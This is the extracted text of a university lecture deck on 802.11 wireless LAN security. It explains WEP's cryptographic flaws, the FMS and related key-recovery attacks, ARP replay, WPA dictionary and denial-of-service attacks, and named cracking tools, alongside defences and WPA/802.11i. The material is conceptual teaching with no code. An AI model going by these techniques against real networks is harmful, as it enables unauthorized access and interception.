WLAN Security 1 Wireless LAN Security Network Security Lecture 8
WLAN Security 1
Wireless LAN Security
Network Security
Lecture 8
WLAN Security 2
WLAN Security - Contents
>Wireless LAN 802.11>Technology>Security History>Vulnerabilities>Demonstration
WLAN Security 3
Wireless LANs
>IEEE ratified 802.11 in 1997.>Also known as Wi-Fi.
>Wireless LAN at 1 Mbps & 2 Mbps.>WECA (Wireless Ethernet Compatibility
Alliance) promoted Interoperability.>Now Wi-Fi Alliance
>802.11 focuses on Layer 1 & Layer 2 of OSI model.>Physical layer>Data link layer
WLAN Security 4
802.11 Components
>Two pieces of equipment defined:>Wireless station
>A desktop or laptop PC or PDA with a wireless NIC.
>Access point>A bridge between wireless and wired networks>Composed of
> Radio> Wired network interface (usually 802.3)> Bridging software
>Aggregates access for multiple wireless stations to wired network.
WLAN Security 5
802.11 modes
> Infrastructure mode> Basic Service Set
> One access point
> Extended Service Set> Two or more BSSs forming a single subnet.
> Most corporate LANs in this mode.
> Ad-hoc mode> Also called peer-to-peer.> Independent Basic Service Set> Set of 802.11 wireless stations that communicate
directly without an access point.> Useful for quick & easy wireless networks.
WLAN Security 6
Infrastructure mode
Basic Service Set (BSS) – Single cell
Extended Service Set (ESS) – Multiple cells
Access Point
Station
WLAN Security 7
Ad-hoc mode
Independent Basic Service Set (IBSS)
WLAN Security 8
802.11 Physical Layer
>Originally three alternative physical layers>Two incompatible spread-spectrum radio in
2.4Ghz ISM band>Frequency Hopping Spread Spectrum (FHSS)
> 75 channels>Direct Sequence Spread Spectrum (DSSS)
> 14 channels (11 channels in US)
>One diffuse infrared layer
>802.11 speed>1 Mbps or 2 Mbps.
WLAN Security 9
802.11 Data Link Layer
> Layer 2 split into:> Logical Link Control (LLC).> Media Access Control (MAC).
> LLC - same 48-bit addresses as 802.3.> MAC - CSMA/CD not possible.
> Can’t listen for collision while transmitting.
> CSMA/CA – Collision Avoidance.> Sender waits for clear air, waits random time, then
sends data.> Receiver sends explicit ACK when data arrives intact.> Also handles interference.> But adds overhead.
> 802.11 always slower than equivalent 802.3.
WLAN Security 10
Hidden nodes
WLAN Security 11
RTS / CTS
>To handle hidden nodes>Sending station sends
>“Request to Send”
>Access point responds with >“Clear to Send”>All other stations hear this and delay any
transmissions.
>Only used for larger pieces of data.>When retransmission may waste significant
time.
WLAN Security 12
802.11b
> 802.11b ratified in 1999 adding 5.5 Mbps and 11 Mbps.
> DSSS as physical layer.> 11 channels (3 non-overlapping)
> Dynamic rate shifting.> Transparent to higher layers> Ideally 11 Mbps.> Shifts down through 5.5 Mbps, 2 Mbps to 1 Mbps.
> Higher ranges.> Interference.
> Shifts back up when possible.
> Maximum specified range 100 metres> Average throughput of 4Mbps
WLAN Security 13
Joining a BSS
>When 802.11 client enters range of one or more APs>APs send beacons.>AP beacon can include SSID.>AP chosen on signal strength and observed
error rates.>After AP accepts client.
>Client tunes to AP channel.
>Periodically, all channels surveyed.>To check for stronger or more reliable APs.>If found, reassociates with new AP.
WLAN Security 14
Access Point Roaming
Channel 4
Channel 7
Channel 9
Channel 1
WLAN Security 15
Roaming and Channels
>Reassociation with APs>Moving out of range.>High error rates.>High network traffic.
>Allows load balancing.
>Each AP has a channel.>14 partially overlapping channels.>Only three channels that have no overlap.
>Best for multicell coverage.
WLAN Security 16
802.11a
>802.11a ratified in 2001 >Supports up to 54Mbps in 5 Ghz range.
>Higher frequency limits the range>Regulated frequency reduces interference
from other devices
>12 non-overlapping channels>Usable range of 30 metres>Average throughput of 30 Mbps>Not backwards compatible
WLAN Security 17
802.11g
>802.11g ratified in 2002 >Supports up to 54Mbps in 2.4Ghz range.
>Backwards compatible with 802.11b
>3 non-overlapping channels>Range similar to 802.11b>Average throughput of 30 Mbps>802.11n due for November 2006
>Aiming for maximum 200Mbps with average 100Mbps
WLAN Security 18
Open System Authentication
>Service Set Identifier (SSID)>Station must specify SSID to Access
Point when requesting association.>Multiple APs with same SSID form
Extended Service Set.>APs can broadcast their SSID.>Some clients allow * as SSID.
>Associates with strongest AP regardless of SSID.
WLAN Security 19
MAC ACLs and SSID hiding
> Access points have Access Control Lists (ACL).> ACL is list of allowed MAC addresses.
> E.g. Allow access to:> 00:01:42:0E:12:1F> 00:01:42:F1:72:AE> 00:01:42:4F:E2:01
> But MAC addresses are sniffable and spoofable.
> AP Beacons without SSID> Essid_jack
> sends deauthenticate frames to client > SSID then displayed when client sends reauthenticate
frames
WLAN Security 20
Interception Range
Station outsidebuilding perimeter.
Basic Service Set (BSS) – Single cell
100 metres
WLAN Security 21
Interception
>Wireless LAN uses radio signal.>Not limited to physical building.>Signal is weakened by:
>Walls>Floors>Interference
>Directional antenna allows interception over longer distances.
WLAN Security 22
Directional Antenna
> Directional antenna provides focused reception.
> DIY plans available.> Aluminium cake tin> Chinese cooking sieve
> http://www.saunalahti.fi/~elepal/antennie.html> http://www.usbwifi.orcon.net.nz/
WLAN Security 23
WarDriving
> Software> Netstumbler> And many more
> Laptop> 802.11b,g or a PC card> Optional:
> Global Positioning System> Car, bicycle, boat…
> Logging of MAC address, network name, SSID, manufacturer, channel, signal strength, noise (GPS - location).
WLAN Security 24
WarDriving results
>San Francisco, 2001>Maximum 55 miles per hour.>1500 Access Points>60% in default configuration.>Most connected to internal backbones.>85% use Open System Authentication.
>Commercial directional antenna>25 mile range from hilltops.
> Peter Shipley - http://www.dis.org/filez/openlans.pdf
WLAN Security 25
WarDriving map Source: www.dis.org/wl/maps/
WLAN Security 26
Worldwide War Drive 2004
>Fourth WWWD>www.worldwidewaredrive.org
>228,537 Access points>82,755 (35%) with default SSID>140,890 (60%) with Open System
Authentication>62,859 (27%) with both, probably default
configuration
WLAN Security 27
Further issues
>Access Point configuration>Mixtures of SNMP, web, serial, telnet.
>Default community strings, default passwords.
>Evil Twin Access Points>Stronger signal, capture user
authentication.
>Renegade Access Points>Unauthorised wireless LANs.
WLAN Security 28
War Driving prosecutions
> February 2004, Texas, Stefan Puffer acquitted of wrongful access after showing an unprotected county WLAN to officials
> June 2004, North Carolina, Lowes DIY store> Botbyl convicted for stealing credit card numbers via
unprotected WLAN> Timmins convicted for checking email & web browsing via
unprotected WLAN
> June 2004, Connecticut, Myron Tereshchuk guilty of drive-by extortion via unprotected WLANs> “make the check payable to M.Tereshchuk”
> Sep 2004, Los Angeles, Nicholas Tombros guilty of drive-by spamming via unprotected WLANs
WLAN Security 29
802.11b Security Services
>Two security services provided:>Authentication
>Shared Key Authentication
>Encryption>Wired Equivalence Privacy
WLAN Security 30
Wired Equivalence Privacy
>Shared key between>Stations.>An Access Point.
>Extended Service Set>All Access Points will have same shared key.
>No key management>Shared key entered manually into
>Stations>Access points>Key management nightmare in large wireless
LANs
WLAN Security 31
RC4
>Ron’s Code number 4>Symmetric key encryption>RSA Security Inc.>Designed in 1987.>Trade secret until leak in 1994.
>RC4 can use key sizes from 1 bit to 2048 bits.
>RC4 generates a stream of pseudo random bits>XORed with plaintext to create ciphertext.
WLAN Security 32
WEP – Sending
> Compute Integrity Check Vector (ICV).> Provides integrity> 32 bit Cyclic Redundancy Check.> Appended to message to create plaintext.
> Plaintext encrypted via RC4> Provides confidentiality.> Plaintext XORed with long key stream of pseudo
random bits.> Key stream is function of
> 40-bit secret key> 24 bit initialisation vector
> Ciphertext is transmitted.
WLAN Security 33
WEP Encryption
RC4PRNG
32 bit CRC
IV
Ciphertext
||
||Plaintext
Secret key
InitialisationVector (IV) Key stream
WLAN Security 34
WEP – Receiving
>Ciphertext is received.>Ciphertext decrypted via RC4
>Ciphertext XORed with long key stream of pseudo random bits.
>Key stream is function of >40-bit secret key>24 bit initialisation vector (IV)
>Check ICV>Separate ICV from message.>Compute ICV for message>Compare with received ICV
WLAN Security 35
Shared Key Authentication
> When station requests association with Access Point> AP sends random number to station> Station encrypts random number
> Uses RC4, 40 bit shared secret key & 24 bit IV
> Encrypted random number sent to AP> AP decrypts received message
> Uses RC4, 40 bit shared secret key & 24 bit IV
> AP compares decrypted random number to transmitted random number
> If numbers match, station has shared secret key.
WLAN Security 36
WEP Safeguards
>Shared secret key required for:>Associating with an access point.>Sending data.>Receiving data.
>Messages are encrypted.>Confidentiality.
>Messages have checksum.>Integrity.
>But management traffic still broadcast in clear containing SSID.
WLAN Security 37
Initialisation Vector
>IV must be different for every message transmitted.
>802.11 standard doesn’t specify how IV is calculated.
>Wireless cards use several methods>Some use a simple ascending counter for
each message.>Some switch between alternate ascending
and descending counters.>Some use a pseudo random IV generator.
WLAN Security 38
Passive WEP attack
>If 24 bit IV is an ascending counter,>If Access Point transmits at 11 Mbps,>All IVs are exhausted in roughly 5 hours.>Passive attack:
>Attacker collects all traffic>Attacker could collect two messages:
>Encrypted with same key and same IV>Statistical attacks to reveal plaintext>Plaintext XOR Ciphertext = Keystream
WLAN Security 39
Active WEP attack
>If attacker knows plaintext and ciphertext pair>Keystream is known.>Attacker can create correctly encrypted
messages.>Access Point is deceived into accepting
messages.
>Bitflipping>Flip a bit in ciphertext>Bit difference in CRC-32 can be computed
WLAN Security 40
Limited WEP keys
>Some vendors allow limited WEP keys>User types in a passphrase>WEP key is generated from passphrase>Passphrases creates only 21 bits of entropy
in 40 bit key.>Reduces key strength to 21 bits = 2,097,152>Remaining 19 bits are predictable.>21 bit key can be brute forced in minutes.
>www.lava.net/~newsham/wlan/WEP_password_cracker.ppt
WLAN Security 41
Creating limited WEP keys
WLAN Security 42
Brute force key attack
>Capture ciphertext.>IV is included in message.
>Search all 240 possible secret keys.>1,099,511,627,776 keys>~170 days on a modern laptop
>Find which key decrypts ciphertext to plaintext.
WLAN Security 43
128 bit WEP
>Vendors have extended WEP to 128 bit keys.>104 bit secret key.>24 bit IV.
>Brute force takes 10^19 years for 104-bit key.
>Effectively safeguards against brute force attacks.
WLAN Security 44
Key Scheduling Weakness
>Paper from Fluhrer, Mantin, Shamir, 2001.
>Two weaknesses:>Certain keys leak into key stream.
>Invariance weakness.
>If portion of PRNG input is exposed, >Analysis of initial key stream allows key to be
determined.>IV weakness.
WLAN Security 45
IV weakness
> WEP exposes part of PRNG input.> IV is transmitted with message.> Every wireless frame has reliable first byte
> Sub-network Access Protocol header (SNAP) used in logical link control layer, upper sub-layer of data link layer.
> First byte is 0xAA> Attack is:
> Capture packets with weak IV> First byte ciphertext XOR 0xAA = First byte key stream> Can determine key from initial key stream
> Practical for 40 bit and 104 bit keys> Passive attack.
> Non-intrusive.> No warning.
WLAN Security 46
Wepcrack
>First tool to demonstrate attack using IV weakness.>Open source, Anton Rager.
>Three components>Weaker IV generator.>Search sniffer output for weaker IVs &
record 1st byte.>Cracker to combine weaker IVs and selected
1st bytes.
>Cumbersome.
WLAN Security 47
Airsnort
>Automated tool>Cypher42, Minnesota, USA.>Does it all!>Sniffs>Searches for weaker IVs>Records encrypted data>Until key is derived.
>100 Mb to 1 Gb of transmitted data.>3 to 4 hours on a very busy WLAN.
WLAN Security 48
Avoid the weak IVs
> FMS described a simple method to find weak IVs> Many manufacturers avoid those IVs after 2002> Therefore Airsnort and others may not work on recent
hardware
> However David Hulton aka h1kari> Properly implemented FMS attack which shows many
more weak IVs> Identified IVs that leak into second byte of key
stream.> Second byte of SNAP header is also 0xAA> So attack still works on recent hardware> And is faster on older hardware> Dwepcrack, weplab, aircrack
WLAN Security 49
Generating WEP traffic
>Not capturing enough traffic?>Capture encrypted ARP request packets>Anecdotally lengths of 68, 118 and 368
bytes appear appropriate>Replay encrypted ARP packets to generate
encrypted ARP replies>Aireplay implements this.
WLAN Security 50
802.11 safeguards
>Security Policy & Architecture Design>Treat as untrusted LAN>Discover unauthorised use>Access point audits>Station protection>Access point location>Antenna design
WLAN Security 51
Security Policy & Architecture
>Define use of wireless network>What is allowed >What is not allowed
>Holistic architecture and implementation >Consider all threats.>Design entire architecture
>To minimise risk.
WLAN Security 52
Wireless as untrusted LAN
>Treat wireless as untrusted.>Similar to Internet.
>Firewall between WLAN and Backbone.>Extra authentication required.>Intrusion Detection
>at WLAN / Backbone junction.
>Vulnerability assessments
WLAN Security 53
Discover unauthorised use
> Search for unauthorised access points, ad-hoc networks or clients.
> Port scanning> For unknown SNMP agents.> For unknown web or telnet interfaces.
> Warwalking!> Sniff 802.11 packets> Identify IP addresses> Detect signal strength> But may sniff your neighbours…
> Wireless Intrusion Detection> AirMagnet, AirDefense, Trapeze, Aruba,…
WLAN Security 54
Access point audits
>Review security of access points. >Are passwords and community strings
secure?>Use Firewalls & router ACLs
>Limit use of access point administration interfaces.
>Standard access point config:>SSID>WEP keys>Community string & password policy
WLAN Security 55
Station protection
> Personal firewalls> Protect the station from attackers.
> VPN from station into Intranet> End-to-end encryption into the trusted network.> But consider roaming issues.
> Host intrusion detection> Provide early warning of intrusions onto a station.
> Configuration scanning> Check that stations are securely configured.
WLAN Security 56
Location of Access Points
>Ideally locate access points>In centre of buildings.
>Try to avoid access points>By windows>On external walls>Line of sight to outside
>Use directional antenna to “point” radio signal.
WLAN Security 57
WPA
> Wi-Fi Protected Access> Works with 802.11b, a and g
> “Fixes” WEP’s problems> Existing hardware can be used> 802.1x user-level authentication> TKIP
> RC4 session-based dynamic encryption keys> Per-packet key derivation> Unicast and broadcast key management> New 48 bit IV with new sequencing method> Michael 8 byte message integrity code (MIC)
> Optional AES support to replace RC4
WLAN Security 58
WPA and 802.1x
> 802.1x is a general purpose network access control mechanism
> WPA has two modes> Pre-shared mode, uses pre-shared keys> Enterprise mode, uses Extensible Authentication
Protocol (EAP) with a RADIUS server making the authentication decision
> EAP is a transport for authentication, not authentication itself
> EAP allows arbitrary authentication methods> For example, Windows supports
> EAP-TLS requiring client and server certificates> PEAP-MS-CHAPv2
WLAN Security 59
Practical WPA attacks
>Dictionary attack on pre-shared key mode>CoWPAtty, Joshua Wright
>Denial of service attack>If WPA equipment sees two packets with
invalid MICs in 1 second>All clients are disassociated>All activity stopped for one minute>Two malicious packets a minute enough to stop a
wireless network
WLAN Security 60
802.11i
>Robust Security Network extends WPA>Counter Mode with Cipher Block Chaining
Message Authentication Code Protocol (CCMP)
>Based on a mode of AES, with 128 bits keys and 48 bit IV.
>Also adds dynamic negotiation of authentication and encryption algorithms
>Allows for future change
>Does require new hardware>www.drizzle.com/~aboba/IEEE/
WLAN Security 61
Relevant RFCs
>Radius Extensions: RFC 2869>EAP: RFC 2284>EAP-TLS: RFC 2716
WLAN Security 62
Demonstration
>War driving>Packet sniffing>Faking Aps>Cracking WEP
>brute force>Dictionary attack>FMS / H1kari attack
>Airsnarf?>Packet injection?